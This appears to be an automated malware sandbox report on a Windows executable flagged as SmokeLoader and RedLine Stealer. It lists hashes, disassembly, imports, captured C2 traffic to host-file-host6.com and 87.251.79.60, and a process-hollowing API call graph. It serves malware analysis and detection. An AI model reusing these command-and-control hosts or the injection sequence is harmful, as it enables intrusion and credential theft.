                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:P2SMn3jloH.exe
                File size:215552
                MD5:0779f7b34e9079944427b8260b49c205
                SHA1:31f2cf1dc970fdfaf51b9aab2c9e0b9715fb53ec
                SHA256:5c7ff5f2993bdb60d15a567dfaef41dcd30875d6629f2775acdb190e01dcef87
                SHA512:e22e6186f82a3eb329874c246a9d64cc45ede3a6ee93447dcdc3e93cb0c52a40b9cfb36e0350e1cdc1487d47bb94d3478b49376c2de5c64a82da545c2c976b3e
                SSDEEP:3072:zmRA4EwqbftQPtRLlTsLxmE6pf5ADM8VGQqf/r4nnFxtHglCFBQx:zmyHbFeRRILgEFI8sfTuxtHMOq
                TLSH:D424CF233AD0C073E27E92758815D7B55A7BB87405365A8B3BE8567C8F313D2AE2434B
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........L.^.".^.".^.".@...C.".@.....".y.Y.Y.".^.#...".@...l.".@..._.".@..._.".Rich^.".........PE..L...#H.a..................... .....
                Icon Hash:aaf8c8eaa2e4a0c1
                Entrypoint:0x4094f6
                Entrypoint Section:.text
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                DLL Characteristics:TERMINAL_SERVER_AWARE
                Time Stamp:0x61884823 [Sun Nov 7 21:41:55 2021 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:5
                OS Version Minor:0
                File Version Major:5
                File Version Minor:0
                Subsystem Version Major:5
                Subsystem Version Minor:0
                Import Hash:8fb85d04360d27123c3a8e1c2ffb7f7e
                Instruction
                call 00007F1E44C53682h
                jmp 00007F1E44C4B66Eh
                mov edi, edi
                push ebp
                mov ebp, esp
                mov eax, dword ptr [ebp+08h]
                test eax, eax
                je 00007F1E44C4B804h
                sub eax, 08h
                cmp dword ptr [eax], 0000DDDDh
                jne 00007F1E44C4B7F9h
                push eax
                call 00007F1E44C4ACC2h
                pop ecx
                pop ebp
                ret
                mov edi, edi
                push ebp
                mov ebp, esp
                mov eax, dword ptr [ebp+08h]
                push esi
                mov esi, ecx
                mov byte ptr [esi+0Ch], 00000000h
                test eax, eax
                jne 00007F1E44C4B855h
                call 00007F1E44C50160h
                mov dword ptr [esi+08h], eax
                mov ecx, dword ptr [eax+6Ch]
                mov dword ptr [esi], ecx
                mov ecx, dword ptr [eax+68h]
                mov dword ptr [esi+04h], ecx
                mov ecx, dword ptr [esi]
                cmp ecx, dword ptr [004312D8h]
                je 00007F1E44C4B804h
                mov ecx, dword ptr [004311F0h]
                test dword ptr [eax+70h], ecx
                jne 00007F1E44C4B7F9h
                call 00007F1E44C4CA01h
                mov dword ptr [esi], eax
                mov eax, dword ptr [esi+04h]
                cmp eax, dword ptr [004310F8h]
                je 00007F1E44C4B808h
                mov eax, dword ptr [esi+08h]
                mov ecx, dword ptr [004311F0h]
                test dword ptr [eax+70h], ecx
                jne 00007F1E44C4B7FAh
                call 00007F1E44C538B9h
                mov dword ptr [esi+04h], eax
                mov eax, dword ptr [esi+08h]
                test byte ptr [eax+70h], 00000002h
                jne 00007F1E44C4B806h
                or dword ptr [eax+70h], 02h
                mov byte ptr [esi+0Ch], 00000001h
                jmp 00007F1E44C4B7FCh
                mov ecx, dword ptr [eax]
                mov dword ptr [esi], ecx
                mov eax, dword ptr [eax+04h]
                mov dword ptr [esi+04h], eax
                mov eax, esi
                pop esi
                pop ebp
                retn 0004h
                mov edi, edi
                push ebp
                mov ebp, esp
                sub esp, 14h
                mov eax, dword ptr [004307FCh]
                xor eax, ebp
                mov dword ptr [ebp-04h], eax
                push ebx
                push esi
                xor ebx, ebx
                Programming Language:
                • [ASM] VS2008 build 21022
                • [ C ] VS2008 build 21022
                • [IMP] VS2005 build 50727
                • [C++] VS2008 build 21022
                • [RES] VS2008 build 21022
                • [LNK] VS2008 build 21022
                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IMPORT0x1e7e40x50.text
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x18b0000x4310.rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                IMAGE_DIRECTORY_ENTRY_DEBUG0x12800x1c.text
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x43480x40.text
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x10000x220.text
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                .text0x10000x1e44a0x1e600False0.5128600823045267data6.400320083175456IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                .data0x200000x16ade40x11c00False0.8920417033450704data7.6284485167398906IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .rsrc0x18b0000x43100x4400False0.6488970588235294data6.048423243299262IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                NameRVASizeTypeLanguageCountry
                RIWEZOZAC0x18e7000x55fASCII text, with very long lines (1375), with no line terminatorsRomanianRomania
                RT_ICON0x18b3300x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0RomanianRomania
                RT_ICON0x18bbd80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0RomanianRomania
                RT_ICON0x18c2a00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0RomanianRomania
                RT_ICON0x18c8080x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0RomanianRomania
                RT_ICON0x18d8b00x988Device independent bitmap graphic, 24 x 48 x 32, image size 0RomanianRomania
                RT_ICON0x18e2380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0RomanianRomania
                RT_STRING0x18ee080xb6dataRomanianRomania
                RT_STRING0x18eec00x2aedataRomanianRomania
                RT_STRING0x18f1700x19cdataRomanianRomania
                RT_ACCELERATOR0x18ec600x58dataRomanianRomania
                RT_GROUP_ICON0x18e6a00x5adataRomanianRomania
                RT_VERSION0x18ecb80x14cIntel 80386 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                DLLImport
                KERNEL32.dllLocalSize, InterlockedExchange, GetTickCount, CopyFileExA, GetConsoleAliasExesLengthW, EnumSystemCodePagesA, TlsGetValue, MoveFileWithProgressA, VerifyVersionInfoW, LocalUnlock, DebugBreak, GlobalGetAtomNameA, MapViewOfFileEx, GetWindowsDirectoryA, GetModuleHandleA, lstrlenW, GlobalDeleteAtom, SizeofResource, WriteConsoleInputA, CopyFileW, SetWaitableTimer, GetVersionExA, FindResourceW, OpenEventA, SearchPathA, GetThreadPriority, CallNamedPipeA, GetProcAddress, GlobalAlloc, SetFileTime, GetConsoleAliasesLengthA, GetComputerNameA, GetSystemWindowsDirectoryA, GetMailslotInfo, GetTapeParameters, OpenJobObjectW, GetPrivateProfileIntA, ReadConsoleInputW, _lread, LockFile, GetPrivateProfileStructW, GetDiskFreeSpaceExW, DefineDosDeviceW, GetACP, SetProcessAffinityMask, GlobalFindAtomW, InterlockedDecrement, VerifyVersionInfoA, CreateActCtxW, FindNextVolumeA, GetComputerNameW, CancelDeviceWakeupRequest, EnumCalendarInfoA, InterlockedCompareExchange, GetPrivateProfileStructA, EnumCalendarInfoW, EnterCriticalSection, InterlockedIncrement, GetNamedPipeHandleStateW, AreFileApisANSI, LoadLibraryA, SetLastError, WriteConsoleW, GetVolumeInformationA, OpenFileMappingA, LoadLibraryW, Sleep, InitializeCriticalSection, DeleteCriticalSection, LeaveCriticalSection, RtlUnwind, RaiseException, GetLastError, HeapFree, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapReAlloc, HeapAlloc, MoveFileA, DeleteFileA, GetStartupInfoW, LCMapStringA, WideCharToMultiByte, MultiByteToWideChar, LCMapStringW, GetCPInfo, GetModuleHandleW, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, HeapCreate, VirtualFree, VirtualAlloc, HeapSize, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, SetHandleCount, GetFileType, GetStartupInfoA, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetOEMCP, IsValidCodePage, GetLocaleInfoA, GetStringTypeA, GetStringTypeW, GetUserDefaultLCID, EnumSystemLocalesA, IsValidLocale, InitializeCriticalSectionAndSpinCount, SetFilePointer, GetConsoleCP, GetConsoleMode, GetLocaleInfoW, FlushFileBuffers, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, CloseHandle, CreateFileA
                GDI32.dllGetCharWidthA
                ADVAPI32.dllSetThreadToken
                Language of compilation systemCountry where language is spokenMap
                RomanianRomania
                TimestampSource PortDest PortSource IPDest IP
                Nov 3, 2022 12:26:08.621563911 CET4969980192.168.2.387.251.79.60
                Nov 3, 2022 12:26:08.715183020 CET804969987.251.79.60192.168.2.3
                Nov 3, 2022 12:26:08.715354919 CET4969980192.168.2.387.251.79.60
                Nov 3, 2022 12:26:08.715487957 CET4969980192.168.2.387.251.79.60
                Nov 3, 2022 12:26:08.715517044 CET4969980192.168.2.387.251.79.60
                Nov 3, 2022 12:26:08.810715914 CET804969987.251.79.60192.168.2.3
                Nov 3, 2022 12:26:09.114351034 CET4969980192.168.2.387.251.79.60
                Nov 3, 2022 12:26:09.205801010 CET804969987.251.79.60192.168.2.3
                Nov 3, 2022 12:26:09.238164902 CET804969987.251.79.60192.168.2.3
                Nov 3, 2022 12:26:09.240447044 CET4969980192.168.2.387.251.79.60
                Nov 3, 2022 12:26:09.551862001 CET4969980192.168.2.387.251.79.60
                Nov 3, 2022 12:26:09.559798956 CET804969987.251.79.60192.168.2.3
                Nov 3, 2022 12:26:09.559859037 CET4969980192.168.2.387.251.79.60
                Nov 3, 2022 12:26:09.727560043 CET804969987.251.79.60192.168.2.3
                Nov 3, 2022 12:26:09.727715015 CET4969980192.168.2.387.251.79.60
                Nov 3, 2022 12:26:10.161276102 CET4969980192.168.2.387.251.79.60
                Nov 3, 2022 12:26:10.251888990 CET804969987.251.79.60192.168.2.3
                TimestampSource PortDest PortSource IPDest IP
                Nov 3, 2022 12:26:08.155019999 CET4997753192.168.2.38.8.8.8
                Nov 3, 2022 12:26:08.616261959 CET53499778.8.8.8192.168.2.3
                Nov 3, 2022 12:26:09.253171921 CET5784053192.168.2.38.8.8.8
                Nov 3, 2022 12:26:10.239569902 CET5784053192.168.2.38.8.8.8
                Nov 3, 2022 12:26:11.279532909 CET5784053192.168.2.38.8.8.8
                Nov 3, 2022 12:26:13.280474901 CET53578408.8.8.8192.168.2.3
                Nov 3, 2022 12:26:14.267415047 CET53578408.8.8.8192.168.2.3
                Nov 3, 2022 12:26:16.298055887 CET53578408.8.8.8192.168.2.3
                TimestampSource IPDest IPChecksumCodeType
                Nov 3, 2022 12:26:14.267613888 CET192.168.2.38.8.8.8cff6(Port unreachable)Destination Unreachable
                Nov 3, 2022 12:26:16.298300982 CET192.168.2.38.8.8.8cff6(Port unreachable)Destination Unreachable
                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                Nov 3, 2022 12:26:08.155019999 CET192.168.2.38.8.8.80x2a3bStandard query (0)host-file-host6.comA (IP address)IN (0x0001)false
                Nov 3, 2022 12:26:09.253171921 CET192.168.2.38.8.8.80x6e7eStandard query (0)host-host-file8.comA (IP address)IN (0x0001)false
                Nov 3, 2022 12:26:10.239569902 CET192.168.2.38.8.8.80x6e7eStandard query (0)host-host-file8.comA (IP address)IN (0x0001)false
                Nov 3, 2022 12:26:11.279532909 CET192.168.2.38.8.8.80x6e7eStandard query (0)host-host-file8.comA (IP address)IN (0x0001)false
                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                Nov 3, 2022 12:26:08.616261959 CET8.8.8.8192.168.2.30x2a3bNo error (0)host-file-host6.com87.251.79.60A (IP address)IN (0x0001)false
                Nov 3, 2022 12:26:13.280474901 CET8.8.8.8192.168.2.30x6e7eServer failure (2)host-host-file8.comnonenoneA (IP address)IN (0x0001)false
                Nov 3, 2022 12:26:14.267415047 CET8.8.8.8192.168.2.30x6e7eServer failure (2)host-host-file8.comnonenoneA (IP address)IN (0x0001)false
                Nov 3, 2022 12:26:16.298055887 CET8.8.8.8192.168.2.30x6e7eServer failure (2)host-host-file8.comnonenoneA (IP address)IN (0x0001)false
                • dcihclar.com
                  • host-file-host6.com
                Session IDSource IPSource PortDestination IPDestination PortProcess
                0192.168.2.34969987.251.79.6080C:\Windows\explorer.exe
                TimestampkBytes transferredDirectionData
                Nov 3, 2022 12:26:08.715487957 CET103OUTPOST / HTTP/1.1
                Connection: Keep-Alive
                Content-Type: application/x-www-form-urlencoded
                Accept: */*
                Referer: http://dcihclar.com/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                Content-Length: 229
                Host: host-file-host6.com
                Nov 3, 2022 12:26:08.715517044 CET104OUTData Raw: 10 87 82 99 1a f1 d0 b2 cd 3d 7d 34 77 c9 e3 89 31 1e d8 34 a0 43 6c 9d cb ee dd f6 f9 d3 e3 80 6d c1 55 d2 6c 1a cc e6 ec a9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 46 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 52 a1 90 21
                Data Ascii: =}4w14ClmUlwmFu$f]dR!@iw4WBYTomqZ#Qil^fV@eq@kSr6VTQdlOWCj@c\|.J\g^yGrr79^+
                Nov 3, 2022 12:26:09.114351034 CET104OUTData Raw: 10 87 82 99 1a f1 d0 b2 cd 3d 7d 34 77 c9 e3 89 31 1e d8 34 a0 43 6c 9d cb ee dd f6 f9 d3 e3 80 6d c1 55 d2 6c 1a cc e6 ec a9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 46 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 52 a1 90 21
                Data Ascii: =}4w14ClmUlwmFu$f]dR!@iw4WBYTomqZ#Qil^fV@eq@kSr6VTQdlOWCj@c\|.J\g^yGrr79^+
                Nov 3, 2022 12:26:09.238164902 CET104INHTTP/1.1 200 OK
                Server: nginx/1.20.2
                Date: Thu, 03 Nov 2022 11:26:09 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Data Raw: 66 0d 0a 59 6f 75 72 20 49 50 20 62 6c 6f 63 6b 65 64 0d 0a 30 0d 0a 0d 0a
                Data Ascii: fYour IP blocked0
                Nov 3, 2022 12:26:09.559798956 CET105INHTTP/1.1 200 OK
                Server: nginx/1.20.2
                Date: Thu, 03 Nov 2022 11:26:09 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Data Raw: 66 0d 0a 59 6f 75 72 20 49 50 20 62 6c 6f 63 6b 65 64 0d 0a 30 0d 0a 0d 0a
                Data Ascii: fYour IP blocked0


                Click to jump to process

                Click to jump to process

                Click to dive into process behavior distribution

                Click to jump to process

                Target ID:0
                Start time:12:25:04
                Start date:03/11/2022
                Path:C:\Users\user\Desktop\P2SMn3jloH.exe
                Wow64 process (32bit):true
                Commandline:C:\Users\user\Desktop\P2SMn3jloH.exe
                Imagebase:0x400000
                File size:215552 bytes
                MD5 hash:0779F7B34E9079944427B8260B49C205
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.254069978.00000000005E9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                Reputation:low

                Target ID:1
                Start time:12:25:05
                Start date:03/11/2022
                Path:C:\Users\user\Desktop\P2SMn3jloH.exe
                Wow64 process (32bit):true
                Commandline:C:\Users\user\Desktop\P2SMn3jloH.exe
                Imagebase:0x400000
                File size:215552 bytes
                MD5 hash:0779F7B34E9079944427B8260B49C205
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.350515025.0000000001F51000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000001.00000002.350515025.0000000001F51000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.350312010.0000000000420000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000001.00000002.350312010.0000000000420000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                Reputation:low

                Target ID:2
                Start time:12:25:11
                Start date:03/11/2022
                Path:C:\Windows\explorer.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\Explorer.EXE
                Imagebase:0x7ff69fe90000
                File size:3933184 bytes
                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000002.00000000.338679207.00000000057B1000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000002.00000000.338679207.00000000057B1000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
                Reputation:high

                Target ID:12
                Start time:12:26:08
                Start date:03/11/2022
                Path:C:\Users\user\AppData\Roaming\utisvaa
                Wow64 process (32bit):true
                Commandline:C:\Users\user\AppData\Roaming\utisvaa
                Imagebase:0x400000
                File size:215552 bytes
                MD5 hash:0779F7B34E9079944427B8260B49C205
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000C.00000002.395157811.00000000006D8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                Antivirus matches:
                • Detection: 100%, Joe Sandbox ML
                • Detection: 46%, ReversingLabs
                • Detection: 35%, Virustotal, Browse
                Reputation:low

                Target ID:13
                Start time:12:26:11
                Start date:03/11/2022
                Path:C:\Users\user\AppData\Roaming\utisvaa
                Wow64 process (32bit):true
                Commandline:C:\Users\user\AppData\Roaming\utisvaa
                Imagebase:0x400000
                File size:215552 bytes
                MD5 hash:0779F7B34E9079944427B8260B49C205
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000D.00000002.409013280.0000000001F51000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000D.00000002.409013280.0000000001F51000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000D.00000002.408977758.0000000001F30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000D.00000002.408977758.0000000001F30000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                Reputation:low

                Reset < >

                  Execution Graph

                  Execution Coverage:5.2%
                  Dynamic/Decrypted Code Coverage:3.9%
                  Signature Coverage:6.7%
                  Total number of Nodes:1545
                  Total number of Limit Nodes:22
                  execution_graph 13498 40dc4e 13499 40dbdc __encode_pointer 7 API calls 13498->13499 13500 40dc55 13499->13500 13464 21b0000 13467 21b0630 13464->13467 13466 21b0005 13468 21b064c 13467->13468 13470 21b1577 13468->13470 13473 21b05b0 13470->13473 13476 21b05dc 13473->13476 13474 21b061e 13475 21b05e2 GetFileAttributesA 13475->13476 13476->13474 13476->13475 13478 21b0420 13476->13478 13479 21b04f3 13478->13479 13480 21b04fa 13479->13480 13481 21b04ff CreateWindowExA 13479->13481 13480->13476 13481->13480 13482 21b0540 PostMessageA 13481->13482 13483 21b055f 13482->13483 13483->13480 13485 21b0110 VirtualAlloc GetModuleFileNameA 13483->13485 13486 21b017d CreateProcessA 13485->13486 13487 21b0414 13485->13487 13486->13487 13489 21b025f VirtualFree VirtualAlloc GetThreadContext 13486->13489 13487->13483 13489->13487 13490 21b02a9 ReadProcessMemory 13489->13490 13491 21b02e5 VirtualAllocEx NtWriteVirtualMemory 13490->13491 13492 21b02d5 NtUnmapViewOfSection 13490->13492 13495 21b033b 13491->13495 13492->13491 13493 21b039d WriteProcessMemory SetThreadContext ResumeThread 13496 21b03fb ExitProcess 13493->13496 13494 21b0350 NtWriteVirtualMemory 13494->13495 13495->13493 13495->13494 11613 409379 11650 40ef38 11613->11650 11615 409385 GetStartupInfoW 11616 4093a8 11615->11616 11651 40e293 HeapCreate 11616->11651 11619 4093f8 11653 40dfec GetModuleHandleW 11619->11653 11623 409409 __RTC_Initialize 11687 40fe78 11623->11687 11624 409350 _fast_error_exit 68 API calls 11624->11623 11626 409417 11627 409423 GetCommandLineW 11626->11627 11767 40f461 11626->11767 11702 4112df GetEnvironmentStringsW 11627->11702 11631 409432 11708 411231 GetModuleFileNameW 11631->11708 11633 40943c 11634 409447 11633->11634 11635 40f461 __amsg_exit 68 API calls 11633->11635 11712 411002 11634->11712 11635->11634 11638 409458 11725 40f520 11638->11725 11640 40f461 __amsg_exit 68 API calls 11640->11638 11641 40945f 11642 40f461 __amsg_exit 68 API calls 11641->11642 11643 40946a __wwincmdln 11641->11643 11642->11643 11731 4057e9 11643->11731 11646 409499 11777 40f6fd 11646->11777 11649 40949e __close 11650->11615 11652 4093ec 11651->11652 11652->11619 11759 409350 11652->11759 11654 40e000 11653->11654 11655 40e007 11653->11655 11780 40f431 11654->11780 11657 40e011 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 11655->11657 11658 40e16f 11655->11658 11661 40e05a TlsAlloc 11657->11661 11841 40dd06 11658->11841 11663 4093fe 11661->11663 11664 40e0a8 TlsSetValue 11661->11664 11663->11623 11663->11624 11664->11663 11665 40e0b9 11664->11665 11784 40f71b 11665->11784 11670 40dbdc __encode_pointer 7 API calls 11671 40e0d9 11670->11671 11672 40dbdc __encode_pointer 7 API calls 11671->11672 11673 40e0e9 11672->11673 11674 40dbdc __encode_pointer 7 API calls 11673->11674 11675 40e0f9 11674->11675 11803 40e2c3 11675->11803 11682 40dc57 __decode_pointer 6 API calls 11683 40e14d 11682->11683 11683->11658 11684 40e154 11683->11684 11823 40dd43 11684->11823 11686 40e15c GetCurrentThreadId 11686->11663 12174 40ef38 11687->12174 11689 40fe84 GetStartupInfoA 11690 40a2da __calloc_crt 68 API calls 11689->11690 11697 40fea5 11690->11697 11691 4100c3 __close 11691->11626 11692 410040 GetStdHandle 11696 41000a 11692->11696 11693 40a2da __calloc_crt 68 API calls 11693->11697 11694 4100a5 SetHandleCount 11694->11691 11695 410052 GetFileType 11695->11696 11696->11691 11696->11692 11696->11694 11696->11695 11698 416ef2 __mtinitlocknum InitializeCriticalSectionAndSpinCount 11696->11698 11697->11691 11697->11693 11697->11696 11699 40ff8d 11697->11699 11698->11696 11699->11691 11699->11696 11700 40ffb6 GetFileType 11699->11700 11701 416ef2 __mtinitlocknum InitializeCriticalSectionAndSpinCount 11699->11701 11700->11699 11701->11699 11703 4112f0 11702->11703 11704 4112f4 11702->11704 11703->11631 11705 40a295 __malloc_crt 68 API calls 11704->11705 11706 411315 _setlocale 11705->11706 11707 41131c FreeEnvironmentStringsW 11706->11707 11707->11631 11709 411266 _wparse_cmdline 11708->11709 11710 40a295 __malloc_crt 68 API calls 11709->11710 11711 4112a9 _wparse_cmdline 11709->11711 11710->11711 11711->11633 11713 41101a _wcslen 11712->11713 11715 40944d 11712->11715 11714 40a2da __calloc_crt 68 API calls 11713->11714 11717 41103e _wcslen 11714->11717 11715->11638 11715->11640 11716 4110a3 11718 4089ea __setlocale_get_all 68 API calls 11716->11718 11717->11715 11717->11716 11719 40a2da __calloc_crt 68 API calls 11717->11719 11720 4110c9 11717->11720 11723 411088 11717->11723 12175 4181a8 11717->12175 11718->11715 11719->11717 11721 4089ea __setlocale_get_all 68 API calls 11720->11721 11721->11715 11723->11717 11724 408a87 __invoke_watson 10 API calls 11723->11724 11724->11723 11726 40f52e __IsNonwritableInCurrentImage 11725->11726 12184 40c620 11726->12184 11728 40f54c __initterm_e 11730 40f56b __IsNonwritableInCurrentImage __initterm 11728->11730 12188 408f48 11728->12188 11730->11641 11732 4057fe 11731->11732 11735 405870 11731->11735 12320 409328 11732->12320 12288 405467 11735->12288 11738 40580e 12340 4091b5 DeleteFileA 11738->12340 11739 40589a 11739->11646 11774 40f6d1 11739->11774 11741 405814 12346 4090a9 11741->12346 11743 40581b 12365 409076 MoveFileA 11743->12365 11745 405822 12371 4074f1 11745->12371 11760 409363 11759->11760 11761 40935e 11759->11761 11763 40f97b __NMSG_WRITE 68 API calls 11760->11763 11762 40fb26 __FF_MSGBANNER 68 API calls 11761->11762 11762->11760 11764 40936b 11763->11764 11765 40f4b5 _malloc 3 API calls 11764->11765 11766 409375 11765->11766 11766->11619 11768 40fb26 __FF_MSGBANNER 68 API calls 11767->11768 11769 40f46b 11768->11769 11770 40f97b __NMSG_WRITE 68 API calls 11769->11770 11771 40f473 11770->11771 11772 40dc57 __decode_pointer 6 API calls 11771->11772 11773 409422 11772->11773 11773->11627 11775 40f5a5 _doexit 68 API calls 11774->11775 11776 40f6e2 11775->11776 11776->11646 11778 40f5a5 _doexit 68 API calls 11777->11778 11779 40f708 11778->11779 11779->11649 11781 40f43c Sleep GetModuleHandleW 11780->11781 11782 40f45a 11781->11782 11783 40e006 11781->11783 11782->11781 11782->11783 11783->11655 11852 40dc4e 11784->11852 11786 40f723 __init_pointers __initp_misc_winsig 11855 40e1fd 11786->11855 11789 40dbdc __encode_pointer 7 API calls 11790 40e0be 11789->11790 11791 40dbdc TlsGetValue 11790->11791 11792 40dbf4 11791->11792 11793 40dc15 GetModuleHandleW 11791->11793 11792->11793 11794 40dbfe TlsGetValue 11792->11794 11795 40dc30 GetProcAddress 11793->11795 11796 40dc25 11793->11796 11801 40dc09 11794->11801 11797 40dc0d 11795->11797 11798 40f431 __crt_waiting_on_module_handle 2 API calls 11796->11798 11799 40dc40 RtlEncodePointer 11797->11799 11800 40dc48 11797->11800 11802 40dc2b 11798->11802 11799->11800 11800->11670 11801->11793 11801->11797 11802->11795 11802->11800 11804 40e2ce 11803->11804 11806 40e106 11804->11806 11858 416ef2 11804->11858 11806->11658 11807 40dc57 TlsGetValue 11806->11807 11808 40dc90 GetModuleHandleW 11807->11808 11809 40dc6f 11807->11809 11811 40dca0 11808->11811 11812 40dcab GetProcAddress 11808->11812 11809->11808 11810 40dc79 TlsGetValue 11809->11810 11814 40dc84 11810->11814 11813 40f431 __crt_waiting_on_module_handle 2 API calls 11811->11813 11816 40dc88 11812->11816 11815 40dca6 11813->11815 11814->11808 11814->11816 11815->11812 11815->11816 11816->11658 11817 40a2da 11816->11817 11819 40a2e3 11817->11819 11820 40a320 11819->11820 11821 40a301 Sleep 11819->11821 11863 4122d8 11819->11863 11820->11658 11820->11682 11822 40a316 11821->11822 11822->11819 11822->11820 12153 40ef38 11823->12153 11825 40dd4f GetModuleHandleW 11826 40dd65 11825->11826 11827 40dd5f 11825->11827 11828 40dda1 11826->11828 11829 40dd7d GetProcAddress GetProcAddress 11826->11829 11830 40f431 __crt_waiting_on_module_handle 2 API calls 11827->11830 11831 40e43f __lock 64 API calls 11828->11831 11829->11828 11830->11826 11832 40ddc0 InterlockedIncrement 11831->11832 12154 40de18 11832->12154 11835 40e43f __lock 64 API calls 11836 40dde1 11835->11836 12157 40a5e0 InterlockedIncrement 11836->12157 11838 40ddff 12169 40de21 11838->12169 11840 40de0c __close 11840->11686 11842 40dd10 11841->11842 11845 40dd1c 11841->11845 11843 40dc57 __decode_pointer 6 API calls 11842->11843 11843->11845 11844 40dd30 TlsFree 11849 40dd3e 11844->11849 11845->11844 11845->11849 11846 40e342 11850 40e354 DeleteCriticalSection 11846->11850 11851 40e362 11846->11851 11847 40e32a DeleteCriticalSection 11848 4089ea __setlocale_get_all 68 API calls 11847->11848 11848->11849 11849->11846 11849->11847 11850->11846 11851->11663 11853 40dbdc __encode_pointer 7 API calls 11852->11853 11854 40dc55 11853->11854 11854->11786 11856 40dbdc __encode_pointer 7 API calls 11855->11856 11857 40e207 11856->11857 11857->11789 11862 40ef38 11858->11862 11860 416efe InitializeCriticalSectionAndSpinCount 11861 416f42 